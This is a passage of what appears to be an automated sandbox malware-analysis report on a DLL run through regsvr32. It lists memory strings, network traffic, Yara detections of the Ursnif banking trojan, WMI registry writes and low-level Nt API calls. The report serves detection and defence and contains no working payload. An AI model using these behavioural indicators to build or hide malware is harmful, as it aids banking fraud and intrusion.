            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/schweiz/krawallanten-halunke-so-giftig-wird-um-die-konzerninit
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/das-l%c3%a4nderspiel-schweiz-ukraine-findet-weder-heute-noch-mo
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/einweg-masken-heissen-nicht-so-weil-man-sie-auf-den-weg-schmeis
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/ich-habe-immer-gemeint-dass-wir-%c3%a4lteren-den-jungen-egal-si
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/pl%c3%b6tzlich-steht-da-roger-federer-und-fragt-nach-marroni/ar
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/rechtsextreme-trainieren-und-posieren-vermummt-in-luzern/ar-BB1
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/wohl-kein-nati-spiel-am-dienstag-in-luzern/ar-BB1b5oQw?ocid=hpl
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/sport/fussball/alle-ukrainer-in-quarant%c3%a4ne-nati-spiel-von-heute-ist-a
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/sport/fussball/petkovic-wollen-auch-k%c3%bcnftig-gegen-grosse-mannschaften
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.office.com/?omkt=de-ch%26WT.mc_id=MSN_site
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msn
            Source: auction[1].htm.6.drString found in binary or memory: https://www.outbrain.com/legal/privacy/de
            Source: iab2Data[1].json.6.drString found in binary or memory: https://www.remixd.com/privacy_policy.html
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_d
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utm
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skype.com/
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/de
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/de/download-skype
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=
            Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
            Source: iab2Data[1].json.6.drString found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
            Source: 85-0f8009-68ddb2ab[1].js.6.drString found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
            Source: iab2Data[1].json.6.drString found in binary or memory: https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf
            Source: auction[1].htm.6.drString found in binary or memory: https://zem.outbrainimg.com/p/srv/sha/bd/60/86/2bac2dfa2c6662619bff6d55b47d20ea92.jpg?w=311&amp;h=33
            Source: auction[1].htm.6.drString found in binary or memory: https://zem.outbrainimg.com/p/srv/sha/cd/43/89/7c899940bc66fc80bffd6e3c5d7ea952cc.jpg?w=311&amp;h=33
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.709938495.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.710009927.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.709960999.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.709897369.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.710074481.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.925636434.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.709991832.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.709847934.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.710050270.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6944, type: MEMORY
            Source: loaddll32.exe, 00000000.00000002.924970262.0000000000AEB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: loaddll32.exe, 00000000.00000002.924970262.0000000000AEB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.709938495.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.710009927.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.709960999.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.709897369.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.710074481.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.925636434.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.709991832.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.709847934.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.710050270.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6944, type: MEMORY

            System Summary:

            barindex
            PE file has a writeable .text sectionShow sources
            Source: 0pz1on1.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: 0pz1on1.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_02191E57 GetProcAddress,NtCreateSection,memset,1_2_02191E57
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_021911EA NtMapViewOfSection,1_2_021911EA
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_021923F5 NtQueryVirtualMemory,1_2_021923F5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026F6066 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_026F6066
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026FB10D NtQueryVirtualMemory,1_2_026FB10D
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_02191E57 GetProcAddress,NtCreateSection,memset,1_2_02191E57
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_021911EA NtMapViewOfSection,1_2_021911EA
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_021923F5 NtQueryVirtualMemory,1_2_021923F5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026F6066 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_026F6066
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026FB10D NtQueryVirtualMemory,1_2_026FB10D
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_021921D41_2_021921D4
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026FAEEC1_2_026FAEEC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026F15CD1_2_026F15CD
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_021921D41_2_021921D4
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026FAEEC1_2_026FAEEC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_026F15CD1_2_026F15CD
            Source: 0pz1on1.dllStatic PE information: invalid certificate
            Source: 0pz1on1.dllStatic PE information: invalid certificate
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: @ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ? .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: > .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: = .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: < .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ; .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: : .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 9 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 8 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 7 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 6 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 5 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 4 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 3 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 2 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 1 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 0 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: - .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: , .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: + .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: * .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ) .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ( .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: & .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: % .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: $ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: # .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ! .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
